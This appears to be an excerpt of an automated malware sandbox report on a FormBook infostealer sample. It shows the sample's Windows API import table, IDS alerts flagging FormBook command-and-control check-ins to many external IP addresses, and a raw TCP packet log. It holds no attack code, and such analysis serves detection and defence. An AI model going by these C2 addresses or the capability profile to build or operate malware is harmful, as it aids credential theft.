                                                                                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                            EnglishGreat Britain
                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2024-11-07T10:50:07.758624+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249161156.234.28.9480TCP
                                                                                                                            2024-11-07T10:50:23.418242+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916338.88.82.5680TCP
                                                                                                                            2024-11-07T10:50:26.438847+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916438.88.82.5680TCP
                                                                                                                            2024-11-07T10:50:28.280726+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916538.88.82.5680TCP
                                                                                                                            2024-11-07T10:50:31.694050+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224916638.88.82.5680TCP
                                                                                                                            2024-11-07T10:50:36.737348+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916715.197.148.3380TCP
                                                                                                                            2024-11-07T10:50:39.900365+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916815.197.148.3380TCP
                                                                                                                            2024-11-07T10:50:41.822475+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916915.197.148.3380TCP
                                                                                                                            2024-11-07T10:50:44.981050+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224917015.197.148.3380TCP
                                                                                                                            2024-11-07T10:50:50.049612+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249171194.58.112.17480TCP
                                                                                                                            2024-11-07T10:50:53.461199+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249172194.58.112.17480TCP
                                                                                                                            2024-11-07T10:50:55.134156+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249173194.58.112.17480TCP
                                                                                                                            2024-11-07T10:50:58.540910+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249174194.58.112.17480TCP
                                                                                                                            2024-11-07T10:51:03.960720+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224917515.197.148.3380TCP
                                                                                                                            2024-11-07T10:51:07.118251+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224917615.197.148.3380TCP
                                                                                                                            2024-11-07T10:51:09.046020+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224917715.197.148.3380TCP
                                                                                                                            2024-11-07T10:51:12.236532+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224917815.197.148.3380TCP
                                                                                                                            2024-11-07T10:51:17.578604+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249179104.21.14.18380TCP
                                                                                                                            2024-11-07T10:51:21.305164+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249180104.21.14.18380TCP
                                                                                                                            2024-11-07T10:51:22.672545+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249181104.21.14.18380TCP
                                                                                                                            2024-11-07T10:51:26.416495+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249182104.21.14.18380TCP
                                                                                                                            2024-11-07T10:51:31.896535+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224918367.223.117.14280TCP
                                                                                                                            2024-11-07T10:51:35.162421+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224918467.223.117.14280TCP
                                                                                                                            2024-11-07T10:51:36.986751+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224918567.223.117.14280TCP
                                                                                                                            2024-11-07T10:51:40.474759+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224918667.223.117.14280TCP
                                                                                                                            2024-11-07T10:51:45.516491+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22491873.33.130.19080TCP
                                                                                                                            2024-11-07T10:51:48.696416+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22491883.33.130.19080TCP
                                                                                                                            2024-11-07T10:51:50.606283+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22491893.33.130.19080TCP
                                                                                                                            2024-11-07T10:51:53.786205+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.22491903.33.130.19080TCP
                                                                                                                            2024-11-07T10:51:59.052723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249191113.20.119.3180TCP
                                                                                                                            2024-11-07T10:52:02.862448+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249192113.20.119.3180TCP
                                                                                                                            2024-11-07T10:52:04.128866+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249193113.20.119.3180TCP
                                                                                                                            2024-11-07T10:52:07.930169+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249194113.20.119.3180TCP
                                                                                                                            2024-11-07T10:52:13.209633+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224919547.129.103.18580TCP
                                                                                                                            2024-11-07T10:52:22.182248+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224919847.129.103.18580TCP
                                                                                                                            2024-11-07T10:52:28.053275+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224919938.47.237.2780TCP
                                                                                                                            2024-11-07T10:52:31.228829+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224920038.47.237.2780TCP
                                                                                                                            2024-11-07T10:52:33.128183+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224920138.47.237.2780TCP
                                                                                                                            2024-11-07T10:52:41.099758+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249203206.119.81.3680TCP
                                                                                                                            2024-11-07T10:52:49.886271+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249206206.119.81.3680TCP
                                                                                                                            2024-11-07T10:52:55.281766+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249207142.250.185.11580TCP
                                                                                                                            2024-11-07T10:52:58.648287+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249208142.250.185.11580TCP
                                                                                                                            2024-11-07T10:53:00.369113+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249209142.250.185.11580TCP
                                                                                                                            2024-11-07T10:53:03.749152+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249210142.250.185.11580TCP
                                                                                                                            2024-11-07T10:53:08.924796+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22492113.33.130.19080TCP
                                                                                                                            2024-11-07T10:53:12.977421+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22492123.33.130.19080TCP
                                                                                                                            2024-11-07T10:53:14.025652+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22492133.33.130.19080TCP
                                                                                                                            2024-11-07T10:53:17.171378+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.22492143.33.130.19080TCP
                                                                                                                            2024-11-07T10:53:22.208640+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249215154.23.184.9580TCP
                                                                                                                            2024-11-07T10:53:25.870570+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249216154.23.184.9580TCP
                                                                                                                            2024-11-07T10:53:27.289467+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249217154.23.184.9580TCP
                                                                                                                            2024-11-07T10:53:30.960649+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249218154.23.184.9580TCP
                                                                                                                            2024-11-07T10:53:36.038217+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249219185.27.134.14480TCP
                                                                                                                            2024-11-07T10:53:39.518506+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249220185.27.134.14480TCP
                                                                                                                            2024-11-07T10:53:41.136815+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249221185.27.134.14480TCP
                                                                                                                            2024-11-07T10:53:44.584974+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249222185.27.134.14480TCP
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 7, 2024 10:50:06.766586065 CET4916180192.168.2.22156.234.28.94
                                                                                                                            Nov 7, 2024 10:50:06.771884918 CET8049161156.234.28.94192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:06.772067070 CET4916180192.168.2.22156.234.28.94
                                                                                                                            Nov 7, 2024 10:50:06.780059099 CET4916180192.168.2.22156.234.28.94
                                                                                                                            Nov 7, 2024 10:50:06.785085917 CET8049161156.234.28.94192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:07.758430004 CET8049161156.234.28.94192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:07.758529902 CET8049161156.234.28.94192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:07.758539915 CET8049161156.234.28.94192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:07.758624077 CET4916180192.168.2.22156.234.28.94
                                                                                                                            Nov 7, 2024 10:50:07.940407991 CET8049161156.234.28.94192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:07.940711975 CET4916180192.168.2.22156.234.28.94
                                                                                                                            Nov 7, 2024 10:50:07.941972017 CET4916180192.168.2.22156.234.28.94
                                                                                                                            Nov 7, 2024 10:50:07.947151899 CET8049161156.234.28.94192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:12.451459885 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:12.456857920 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:12.456948996 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:12.457195997 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:12.462048054 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.083417892 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.083436012 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.083458900 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.083471060 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.083481073 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.083492994 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.083503962 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.083520889 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.083533049 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.083543062 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.083668947 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.083715916 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.088874102 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.088895082 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.088907957 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.088953018 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.088989973 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.089267015 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.109113932 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.206801891 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.206821918 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.206832886 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.206931114 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.207036018 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.207055092 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.207066059 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.207073927 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.207089901 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.207441092 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.207485914 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.207492113 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.207504034 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.207515001 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.207525015 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.207537889 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.207551956 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.208091021 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.208101034 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:13.208132029 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:13.208148003 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.277905941 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.277935028 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.277946949 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.277956963 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.277960062 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.277985096 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.277992010 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.277992010 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278003931 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278012037 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278023958 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278023958 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278043985 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278055906 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278181076 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278192043 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278203964 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278213024 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278235912 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278238058 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278249025 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278259993 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278270960 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278278112 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278286934 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278291941 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278305054 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278326035 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278381109 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278392076 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278403044 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278415918 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278426886 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278435946 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278435946 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278435946 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278439999 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278450012 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278453112 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278464079 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278466940 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278481960 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278495073 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278625965 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278636932 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278646946 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278656960 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278662920 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278669119 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278672934 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278681993 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278687954 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278692961 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278707027 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278712034 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278717995 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278723001 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278743029 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278755903 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.278810024 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.278842926 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.279040098 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.279042959 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.279071093 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.286919117 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.286930084 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.286956072 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.286962032 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.286966085 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.286993027 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.286999941 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.287019968 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:14.287142992 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:14.287175894 CET4916280192.168.2.2245.33.6.223
